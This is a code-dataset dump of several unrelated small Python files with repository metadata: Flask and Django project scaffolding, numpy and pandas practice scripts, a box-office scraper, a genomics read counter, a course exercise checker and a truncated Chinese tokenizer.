from os import environ
from MediaTrailers import app
if __name__ == '__main__':
HOST = environ.get('SERVER_HOST', 'localhost')
try:
PORT = int(environ.get('SERVER_PORT', '5555'))
except ValueError:
PORT = 5555
app.run(HOST, PORT)
|
[
"darren.matis@gmail.com"
] |
darren.matis@gmail.com
|
1b23c7b7ea9eb0f9ac3e173e043db613b169fb22
|
1a4fb457cdbd1ac5851a6a7cf7a8824f5c3cb946
|
/numpy/npOperation.py
|
545a5472e2a29e3c5a74e428b93a985295510c4b
|
[] |
no_license
|
nlhsueh/Learn-Python
|
2cce28b1c3afb39280da647cae8314efa3f8f5fa
|
fded46c9553691370fff443a6748b7f73195c766
|
refs/heads/master
| 2021-09-12T06:52:34.988760
| 2018-04-15T02:35:24
| 2018-04-15T02:35:24
| 105,233,608
| 2
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 845
|
py
|
import numpy as np
# +-*/
a = np.arange(5)
b = np.arange(5)
c = a + b
print (c) # [0 2 4 6 8]
c = a - b
print (c) # [0 0 0 0 0]
c = a * b
print (c) # [0 1 4 9 16]
c = a**3
print (c) # [0 1 8 27 64]
c = a > 3
print (c) # [False False False False True]
# reshape
a = np.arange(6).reshape(2,3)
print (a)
# [[0 1 2]
# [3 4 5]]
print (a[0]) # [0 1 2]
print (a[0, 1]) # 1
print (a[0, 1:3]) # [1 2]
# MEAN, MIN, MAX
a = np.array([[34, 12, 90], [20, 56, 90], [45, 56, 92], [1, 2, 3]])
print ('min and max: ', np.min(a), a.max())
print ('mean: ', a.mean())
print ('column mean: ', a.mean(axis = 0))
print ('row mean: ', a.mean(axis = 1))
print ('sort: ', np.sort(a))
p = a > 60
print (p)
a[a > 60]
# transport
a = np.array([[34, 12, 90], [20, 56, 90], [45, 56, 92], [1, 2, 3]])
print (a.T)
# [[34 20 45 1]
# [12 56 56 2]
# [90 90 92 3]]
|
[
"nlhsueh@fcu.edu.tw"
] |
nlhsueh@fcu.edu.tw
|
cf53086f857ba3246e025162e7ecf389e4e1067e
|
5ecaa750834898e8c58bd00d1e820c6e6bd4ef94
|
/gene_selection/sort_snp_list.py
|
546f5000a6aabe7634eb515da568d65b811bf419
|
[] |
no_license
|
SaundersLab/MARPLE_plant_pathogen_diagnostics
|
d7cbe4aa5a59a24773d1f6f8556ed4fd6fdf7b09
|
4896ed9ecf9b71c561aa387d5fd8e0b357ae3df4
|
refs/heads/master
| 2022-04-14T22:07:11.994622
| 2020-02-20T21:06:53
| 2020-02-20T21:06:53
| 171,909,384
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 234
|
py
|
#!/usr/bin/env python
import pandas as pd
import sys
input_table = pd.read_table(sys.argv[1],header=0)
sorted_table=input_table.sort_values(['Gene', 'Position'])
sorted_table.to_csv(sys.argv[1]+'.sorted.tsv',index=False, sep='\t')
|
[
"gradhakr@users.noreply.github.com"
] |
gradhakr@users.noreply.github.com
|
e545e3353d0b386f0cd6a6971d5403a849d55d35
|
7e7661c1f4ba682291ddf46851cd319777f33ca0
|
/week_one/print.py
|
447843549021409edfc89715124f6d521466f2d9
|
[] |
no_license
|
MikeDrewitt/python_seminar
|
87c57d335001e95a4d30b9b57c5a6a35dd80a1ac
|
9be405699468fc9701aaab33a2d0de4ed9da1b9c
|
refs/heads/master
| 2021-01-21T09:06:55.403066
| 2017-05-02T23:06:36
| 2017-05-02T23:06:36
| 82,864,654
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 56
|
py
|
# This is how you print in python
print("hello world!")
|
[
"mikedrewitt@gmail.com"
] |
mikedrewitt@gmail.com
|
11a7e8f0fb7b4ee2f2cd6194fa11e6cfa562f5f0
|
e325822e10d8343486cff3276c240272f4d6e3a0
|
/flask/tutorial/app.py
|
763f335afb76ab231c1a9b76d4e024eed7c96e85
|
[] |
no_license
|
EunhaKyeong/studyRepo
|
c9b25d19c8a9c62351b48bef3417177adad8a933
|
f8a252cff479d828bb2811f47419ea7d0d5f7718
|
refs/heads/master
| 2023-02-22T01:57:41.939452
| 2021-01-19T11:33:16
| 2021-01-19T11:33:16
| 301,754,097
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 898
|
py
|
from flask import Flask, render_template, request
#Flask 객체 인스턴스 생성
app = Flask(__name__)
#localhost/ url에 접속해 index.html 페이지로 이동.
#웹 페이지를 하나씩 추가할 때마다 @app.rount()를 추가하고 아래 함수를 작성해야 함.
@app.route('/')
def index():
return render_template('index.html')
@app.route("/post", methods=['POST'])
def post():
user = request.form['user']
data = {'level':60, 'point':360, 'exp':45000}
return render_template('post.html', user=user, data=data)
@app.route("/get", methods=['GET'])
def get():
user = "반원"
data = {'level':60, 'point':360, 'exp':45000}
return render_template('get.html', user=user, data=data)
if __name__ == "__main__":
#서버 실행
app.run(debug=True)
#host를 직접 지정하고 싶으면
#app.run(host="127.0.0.1", port="5000", debug=True)
|
[
"eunha4685@naver.com"
] |
eunha4685@naver.com
|
ca0ce7609cecd3ff3ec45ee5766b4208758b3485
|
dc82eb85df2342ef904b2993cf0ee619b2a470eb
|
/lab6/numberorder.py
|
1f60c5087477f14b815ee67b0311f931aff6e713
|
[] |
no_license
|
djstull/COMS127
|
e643037ae778632d7b8f9ff3a8d509129f3aa4ef
|
4c5129bee3f55c11f96b870ab354b565e6f2297b
|
refs/heads/master
| 2020-03-28T02:24:23.963125
| 2018-12-06T21:33:23
| 2018-12-06T21:33:23
| 147,567,738
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
def numberorder(numbers):
for i in range( len(numbers) - 1):
if numbers[i] < numbers[i+1]:
return False
return True
print(numberorder([3, 2, 1])
print(numberorder([1, 2, ]))
|
[
"djstull@iastate.edu"
] |
djstull@iastate.edu
|
ff13c2abde11b7d35c4fe06755453b0a10b65b15
|
83d6dd1343f708994541ece6390cef6fa9f56131
|
/blackjack/api/event/after_turn_event.py
|
30e83a3effcd06b74f60d501844864f9305792db
|
[] |
no_license
|
egorklimov/blackjack
|
e33340d91aac75bf8d4d7f2200496fce54712662
|
30fd62974be59e889078d796bc87e201633992fa
|
refs/heads/master
| 2023-04-25T11:05:38.902072
| 2021-05-04T22:50:07
| 2021-05-04T22:50:07
| 341,987,129
| 0
| 0
| null | 2021-05-04T19:24:34
| 2021-02-24T17:54:28
|
Python
|
UTF-8
|
Python
| false
| false
| 33
|
py
|
class AfterTurnEvent():
pass
|
[
"klimovgeor@yandex.ru"
] |
klimovgeor@yandex.ru
|
7fb4e3e6d436cb17f649d2fc95b4196a1cf239a4
|
f53fbf82c8c028f5493bcfdf710578d0d3cb686e
|
/mysite/settings.py
|
9c787f84c688b0a6f8aca8d8641d3b58de290c23
|
[] |
no_license
|
window-dragon/blog
|
4479f0d1afecaf0447f8972385634ee7d658e0aa
|
c58748f1c9dd5fd371e276063f7a131093a9e21f
|
refs/heads/master
| 2022-05-11T13:50:02.545032
| 2019-03-05T12:59:39
| 2019-03-05T12:59:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,154
|
py
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 't7epu1jvkd(ynp%pu$*6+5r)9wlgjsn)bl%ww#!bw^6$4k0w$l'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
[
"core.jeong@samsung.com"
] |
core.jeong@samsung.com
|
88b482164e4af4a7796048ebb8cd38c827e1e1e6
|
10580fdc5ab97755220910c30016493f76359ad6
|
/portfolio/settings.py
|
d90db1e3f722415037c64da86d81d48a4ae62f7a
|
[] |
no_license
|
zhlooooo/portfolio
|
650632d0f7065afaa907e14f654dabe8bf4af2ee
|
c16aaa57d40d3b7a8a8d89b1407b6929266466fa
|
refs/heads/master
| 2020-08-13T10:07:40.430908
| 2019-10-14T08:50:50
| 2019-10-14T08:50:50
| 214,383,005
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,211
|
py
|
"""
Django settings for portfolio project.
Generated by 'django-admin startproject' using Django 2.2.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fjmv2-9eb1_6npd#+xmc^lmcb1tm=o$3zk(fo9%m1=t!!xd1c^'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'gallery.apps.GalleryConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'portfolio.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
|
[
"zhlooooo@126.com"
] |
zhlooooo@126.com
|
3295098797be67f18cbf21f8eccd11345ce99a07
|
c68a31a97fdd126261f5d12004f1477073ca4058
|
/box_office.py
|
ef956b80a376ef64aab0ea9bc3160fd9a545c8d6
|
[] |
no_license
|
zhuo2015/box_office_predicate
|
4f03efb1bc1e003809b9a977d9a28ffb3d215ea3
|
0a6c25de55a55e90be8949477ed4d86b349ec8da
|
refs/heads/master
| 2021-01-23T07:51:42.821240
| 2017-01-31T15:28:54
| 2017-01-31T15:28:54
| 80,519,273
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 494
|
py
|
# coding:uft-8
import pandas as pd
import requests
json11 = "http://www.cbooo.cn/BoxOffice/GetHourBoxOffice?d=1485874026355"
url_xml = 'http://www.cbooo.cn/BoxOffice/GetHourBoxOffice'
tt = requests.get(url_xml)
ss = tt.json()
ddf = pd.DataFrame(ss['data2'])
ddf.columns =['实时票房','排名', 'xxx','片名','票房占比','xxx','上映天数', '累计票房']
del ddf['xxx']
ddf.reindex(columns=['排名', '片名','实时票房','票房占比','上映天数', '累计票房','xxxid'])
|
[
"lizhuo.guo@gmail.com"
] |
lizhuo.guo@gmail.com
|
3a76e89ee62728238df4a79fdf06721e3beb38c3
|
9dc02b09fd114db62539346fe1e048094511958a
|
/sql_orm/manage.py
|
cf62761fd3c18a0fce70316f963967e165cdad7d
|
[] |
no_license
|
jscpy/PythonRules
|
afa88bfb3d736b6af5cbb082bd27c2f949fb97b6
|
72cb9bad837a33d8e778151d7017632013ca6ad7
|
refs/heads/master
| 2021-01-10T09:24:55.223882
| 2016-01-31T20:13:47
| 2016-01-31T20:13:47
| 46,196,617
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 250
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "sql_orm.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
[
"jsc.py.14@gmail.com"
] |
jsc.py.14@gmail.com
|
54b0d750a04237f92f7be27b78755fc8b5a6a181
|
ea0d1c159f93e4b0eed5b370632ed64c9306d969
|
/raspberry/test/sensor/find_device.py
|
a5be6cda7ade5515bd9064b7361c4b2c3d0651b6
|
[] |
no_license
|
jes9401/UleungCare
|
0e00ef7eac3a4ee5b3414f77bc3a95b7fe1065db
|
ce2161056d8aef9b0778ef5cbdc76413f53a092d
|
refs/heads/master
| 2022-11-23T20:37:10.852977
| 2020-08-01T04:49:50
| 2020-08-01T04:49:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
import subprocess
def find_dev():
cmd = ['ls', '/sys/bus/usb-serial/devices/']
#ls /sys/bus/usb-serial/devices/ | sed "s/^/\/dev\//g"
fd_popen = subprocess.Popen(cmd,stdout=subprocess.PIPE).stdout
data = fd_popen.read().strip()
fd_popen.close()
print(data.decode('utf-8'))
return(data.decode('utf-8'))
|
[
"wjrmffldrhrl@gmail.com"
] |
wjrmffldrhrl@gmail.com
|
d9f089ba5012ba7812eb465dae6271303b65bc12
|
2cbdab70099d227a229bbd355c44b3a12dcea8ea
|
/mapred/results/aap.py
|
952b4262f3e21b928b716f7138dc78ed108e0d34
|
[] |
no_license
|
Mitan/CS5344-StockTweets
|
559345353566f9eb7266109bf11dc04cb15f2482
|
5ad9ce63ac98ee06d70a9d2f6589e5519a1e0093
|
refs/heads/master
| 2020-06-02T15:20:19.384521
| 2015-04-30T08:42:09
| 2015-04-30T08:42:09
| 30,401,074
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
py
|
from collections import OrderedDict
p = OrderedDict()
with open("appl.txt") as f:
for i in f:
l=i.rstrip().split()
k=l[0]
v=l[1]
if p.has_key(k):
p[k] = int(p[k]) + int(v)
else:
p[k] = int(v)
for h,a in p.iteritems():
print h,a
|
[
"kalraritz@hotmail.com"
] |
kalraritz@hotmail.com
|
df6051ac1a7d4ce35f0afbcc52ffb91a7cc50b5a
|
9dde95007fe49ba5b8457a8b9672cd66303e9daa
|
/managevm/urls.py
|
69db3673ad5ed0bd0ee2bbf9ffbc93360d8a1ded
|
[
"MIT"
] |
permissive
|
peacedata0/manage-vm
|
7c033cdc52b2de22fe0b089cac9f4a591a94591b
|
bab2d3e1b6fca9fbe1aa9d53dc555abc67f58ba1
|
refs/heads/master
| 2020-05-24T11:24:26.544652
| 2016-04-17T19:40:19
| 2016-04-17T19:40:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 810
|
py
|
"""managevm URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import include, url
from django.contrib import admin
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^', include('main.urls')),
]
|
[
"zujko@csh.rit.edu"
] |
zujko@csh.rit.edu
|
b13c0ad324dfe1dea4cb7bac8b46b4b8f2f757cf
|
5d9dd59ccb74745976f5d13c00ac9c9bb5b22f7b
|
/genData.py
|
3718c74dfac46be532244289e7fa181b216dcc87
|
[] |
no_license
|
Supeking/vgg19-preTrain
|
0270eb86e8a0fa75f915aa393cb643cc7ec60614
|
459700968e812a3848938a58ed414d907b529817
|
refs/heads/master
| 2020-07-06T10:05:44.315065
| 2019-08-18T09:14:51
| 2019-08-18T09:14:51
| 202,980,936
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 671
|
py
|
import cv2
from glob import glob
import os
import random
path_P = './task7_insulator/P'
path_N = './task7_insulator/N'
def readImg_P():
P = glob(os.path.join(path_P, '*.jpg'))
N = glob(os.path.join(path_N, '*.jpg'))
while 1:
random.shuffle(P)
for imgPath in P:
img = cv2.imread(os.path.join(imgPath))
img = cv2.resize(img, (448, 448))/255.0
yield img
def readImg_N():
N = glob(os.path.join(path_N, '*.jpg'))
while 1:
random.shuffle(N)
for imgPath in N:
img = cv2.imread(os.path.join(imgPath))
img = cv2.resize(img, (448, 448))/255.0
yield img
|
[
"noreply@github.com"
] |
Supeking.noreply@github.com
|
0324e1ecee3ef141ffae62cecdf089f009b2bb68
|
de95e9ace929f6279f5364260630e4bf7a658c1c
|
/stack.py
|
89f33daacded1cf737e1c66b1c1acc59e93f24a9
|
[] |
no_license
|
ludwigwittgenstein2/Algorithms-Python
|
ceaf0739b8582f7bd749a9b3f52f283765044744
|
c5bed8b2e398c218d1f36e72b05a3f5545cf783a
|
refs/heads/master
| 2021-06-19T11:40:31.012268
| 2017-07-02T04:59:20
| 2017-07-02T04:59:20
| 75,953,711
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 334
|
py
|
class Stack:
def __init__(self):
self.items = []
def isEmpty(self):
return self.items == []
def push(self, item):
self.items.append(item)
def pop(self):
self.items.pop()
def peek(self):
return self.items[len(self.items)-1]
def size(self):
return len(self.items)
|
[
"penpals.oranges14@gmail.com"
] |
penpals.oranges14@gmail.com
|
520a7fec37510d48d644de979c7f5d4f4a79ab30
|
b3c30e4683df07096c0aa0ecf6be1443dfa60de9
|
/high_vs_low_performer_dup_coverage.py
|
c38daea203fbea669d07ba8d198d2ee8e25ded6d
|
[] |
no_license
|
B-Rich/Suecica
|
cd26cacf90daa546dc74d64e7ff79e696f9278a6
|
bbd3b66750b03f3cefe06e10b60370f08a06df2e
|
refs/heads/master
| 2021-01-22T02:12:47.790301
| 2013-06-14T16:27:43
| 2013-06-14T16:27:43
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,417
|
py
|
#!/usr/bin/env python3
from collections import Counter
import gzip
import sys; sys.path.append('../Packages/')
from GenomeTools import GFF
#dup_filename = ""
#dup_filename = "Data/As_Duplications_Meiosis_Genes_(Aa_Filtered).txt"
dup_filename = "Data/As_Duplications_(Aa_Filtered).txt"
high_filename = "Data/Sue/SxN_F2s/HighPerformers/Al_filtered_SAM/HighPerformers.sam.gz"
low_filename = "Data/Sue/SxN_F2s/LowPerformers/Al_filtered_SAM/LowPerformers.sam.gz"
#outfilename = "Output/High_vs_Low_Meiosis_Reads.txt"
outfilename = "Output/High_vs_Low_AllDupGene_Reads.txt"
#outfilename = "Output/High_vs_Low_AllGene_Reads.txt" # For this: dup_filename = ""
#high_filename = "Data/Sue/SxN_F2s/RandomExp/HighPerformers/Al_filtered_SAM/HighPerformers.sam.gz"
#low_filename = "Data/Sue/SxN_F2s/RandomExp/LowPerformers/Al_filtered_SAM/LowPerformers.sam.gz"
#outfilename = "Output/High_vs_Low_RandomGroups_AllDupGene_Reads.txt"
gff_file = "../Thalyrata.gff"
high_total_cov = 0
low_total_cov = 0
high_gene_reads = Counter()
low_gene_reads = Counter()
# Open GFF file and make dictionary containing gene names & their positions
gff_genes_dict = GFF.Parse(gff_file, create_nuc_dict=True)
# Open list of duplicated meiosis genes and store them
if dup_filename != "":
dup_genes = []
with open(dup_filename) as infile:
for line in infile:
line = line.strip()
dup_genes.append(line)
for entry in dup_genes:
high_gene_reads[entry] = 1
low_gene_reads[entry] = 1
# Examine all duplicated genes, not just meiosis duplicated genes
if dup_filename == "":
dup_genes = gff_genes_dict.gene_dict.keys()
for entry in gff_genes_dict.gene_dict.keys():
high_gene_reads[entry] = 1
low_gene_reads[entry] = 1
# Count up the number of reads per gene for the High Performers file
with gzip.open(high_filename, 'rb') as infile:
for line in infile:
line = line.decode('utf-8')
if line[:1] != "@":
line = line.split("\t")
high_total_cov += 1
chromosome = str(line[2])
s_pos = int(line[3])
gene_name = gff_genes_dict.get_gene_name(chromosome, s_pos)
if gene_name != None:
high_gene_reads[gene_name] += 1
# Count up the number of reads per gene for the Low Performers file
with gzip.open(low_filename, 'rb') as infile:
for line in infile:
line = line.decode('utf-8')
if line[:1] != "@":
line = line.split("\t")
low_total_cov += 1
chromosome = str(line[2])
s_pos = int(line[3])
gene_name = gff_genes_dict.get_gene_name(chromosome, s_pos)
if gene_name != None:
low_gene_reads[gene_name] += 1
# Normalize high performing individuals' read counts
high_dif = low_total_cov / high_total_cov
if high_total_cov > low_total_cov:
print("High Performer group reads are scaled down by ", str(high_dif), sep='')
else:
print("High Performer group reads are scaled up by ", str(high_dif), sep='')
high_gene_reads = {gene_name: x * high_dif for gene_name, x in high_gene_reads.items()}
# Output ratio of high performing vs. low performing reads
with open(outfilename, 'w') as outfile:
outline = "Gene\tHighPerformanceNormalizedCount\tLowPerformanceNormalizedCount\tRatio\n"
outfile.write(outline)
for gene in sorted(dup_genes):
outline = "\t".join([gene, str(high_gene_reads[gene]), str(low_gene_reads[gene]), str(round(high_gene_reads[gene]/low_gene_reads[gene],2)), "\n"])
outfile.write(outline)
|
[
"mdporter@ucdavis.edu"
] |
mdporter@ucdavis.edu
|
060911f150471af95103a2ef84238b3cda7db2d3
|
425985723e44ada0de949b12c42f01308ca6adbe
|
/poco/main/media/course_1/module_3/assessmentFiles/challenge_2.py
|
b0e0ac1c743eba93c6fc9553831f145adb5bbb2d
|
[] |
no_license
|
Bharathkumar-nb/Poco-Localization
|
d5f900bff3abae51fe187a2678b6b5375e2d870b
|
8a9264b87d243c5f42765f1281b8674de353da83
|
refs/heads/master
| 2022-12-10T07:18:25.243018
| 2017-05-02T22:07:58
| 2017-05-02T22:07:58
| 89,995,931
| 1
| 0
| null | 2022-12-07T23:40:35
| 2017-05-02T05:45:29
|
HTML
|
UTF-8
|
Python
| false
| false
| 777
|
py
|
#Module 0
#Challenge 2
'''
x = '23'
'''
import sys
def report( name, shortd, longd):
d = {'Name': name, 'Short': shortd, 'Long': longd}
print(str(d))
#Mock data goes first
try:
&&& # paste user code here
except Exception as e:
report('Generic error', 'On your own', 'Look for typos')
sys.exit(1)
try:
y # does var exist?
except NameError as e:
report('Name error', "Don't see y on left", 'Look for typos')
sys.exit(1)
if not isinstance(y, str):
report('Data type bug', "Did you type the '23' correctly?", 'It should have quotes around it')
sys.exit(1)
try:
check = (y == '23')
except Exception as e:
report('Generic error', "On your own", 'Look for typos')
else:
if not check:
report('Value bug', "'Did you type '23' with quotes?", 'Look for typos')
|
[
"bharathkmr.nb@gmail.com"
] |
bharathkmr.nb@gmail.com
|
ebfac981b788884abacf358c0e34af682a4c3c70
|
d7fc794b9fd3635ee403999af75bfb7ace8c0963
|
/codes/allMycats1.py
|
182c6300882229536b855a57dcfb2f27e29f7a67
|
[] |
no_license
|
gbt1988/PythonToWork
|
ff29d7bbb20397d1745ef1211dbe07a525eb3554
|
0944fcc3f991c2cd6352404bc55175316e2c19e2
|
refs/heads/master
| 2021-01-09T12:40:09.995303
| 2020-03-08T13:20:07
| 2020-03-08T13:20:07
| 242,303,958
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 447
|
py
|
print('Enter the name of cat 1:')
catName1 = input()
print('Enter the name of cat 2:')
catName2 = input()
print('Enter the name of cat 3:')
catName3 = input()
print('Enter the name of cat 4:')
catName4 = input()
print('Enter the name of cat 5:')
catName5 = input()
print('Enter the name of cat 6:')
catName6 = input()
print('The cat names are:')
print(catName1 + ' ' + catName2 + ' ' + catName3 + ' ' + catName4 + ' ' +catName5 + ' ' + catName6)
|
[
"kaihuasun@163.com"
] |
kaihuasun@163.com
|
f11d2fe34d4382c50aa6e64282213993a90932ca
|
f869fb919cf506cbb55ef911841a97487837a87c
|
/model/data_utils.py
|
a9428af30bf4673d400ccce9708a957258d3431c
|
[] |
no_license
|
Won-Andwon/RNN_Mood_QA
|
7c3175de471e0515cfeabc4196186e18bec5dcf7
|
f1ebb392a45d2a48c9faf86ff013ae049a9d6009
|
refs/heads/master
| 2021-01-14T08:06:04.195959
| 2017-08-02T12:35:43
| 2017-08-02T12:35:43
| 81,922,793
| 0
| 0
| null | 2017-08-27T02:52:29
| 2017-02-14T08:27:20
|
Python
|
UTF-8
|
Python
| false
| false
| 12,932
|
py
|
# 此处部分代码部分来源于
# https://github.com/tensorflow/models/tree/master/tutorials/rnn/translate
# 有改动和添加 因为是源码改动 所以没有import 借鉴的部分的链接如上
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import re
import sys
from tensorflow.python.platform import gfile
import tensorflow as tf
import jieba
_PAD = "_PAD"
_GO = "_GO"
_EOS = "_EOS"
_UNK = "_UNK"
_DIG = "_DIG"
_START_VOCAB = [_PAD, _GO, _EOS, _UNK]
PAD_ID = 0
GO_ID = 1
EOS_ID = 2
UNK_ID = 3
# ?!《》{}-——+=、 字符数字的去除
_WORD_SPLIT = re.compile("([.,!?\"':;,。;“‘’”:)(])")
_DIGIT_RE = re.compile(r"\d")
# 我去掉了符号?!?! 这两个很常用且能表意
_SPECIAL_CHAR = " \t\\,./;'\"" \
"[]`~@#$%^&*()_+-={}:<>" \
"~~·@#¥%……&*()——【】:“”;’‘《》,。、" \
"abcdefghijklmnopqrstuvwxyz" \
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" \
"ばれやうしヾヘてまにづらでノつゥヽすりっい`がのかえよみんおねッグ" \
"①②③④adeеghнknoοQtU🇮с×а" \
"αnΘ" \
"︺︹」└「┍┑╯╰╭╮︶‿/\〉|∠>〉︿─_ ̄=◡⌒" \
"Σ≤≥≧≦єεз←→↓≡⊂⊃∩∀⊙▽∇△∈≠›" \
"" ◉◕。ಥ❁ω♡ㅂl-﹏´" \
"ԅы•ⅱдлшوΠ�.●・ฅ°✧・□〃%℃@☞☜✲゚〜˘ˇé︴゜#"
_MYDICT = r"../resource/mydict.txt"
def basic_tokenizer(sentence, chs=True, char_level=False):
"""
基本分词工具
:param sentence: 源语句
:param chs: TRUE 汉语且未分词 FALSE 基于空格分词
:param char_level: 是否基于字符
:return: 词列表
"""
if char_level:
return [x for x in sentence.strip() if x not in _SPECIAL_CHAR]
else:
# 调用结巴的中文分词
if chs:
sentence = sentence.strip()
words_list = jieba.cut(sentence, cut_all=False)
return [x.lower() for x in words_list if x not in _SPECIAL_CHAR]
# 非中文 基于空格分词
else:
words = []
for space_separated_fragment in sentence.strip().split():
words.extend(_WORD_SPLIT.split(space_separated_fragment))
return [w.lower() for w in words if w]
def create_vocabulary(vocabulary_path, data_path_list,
max_character_size, tokenizer=None,
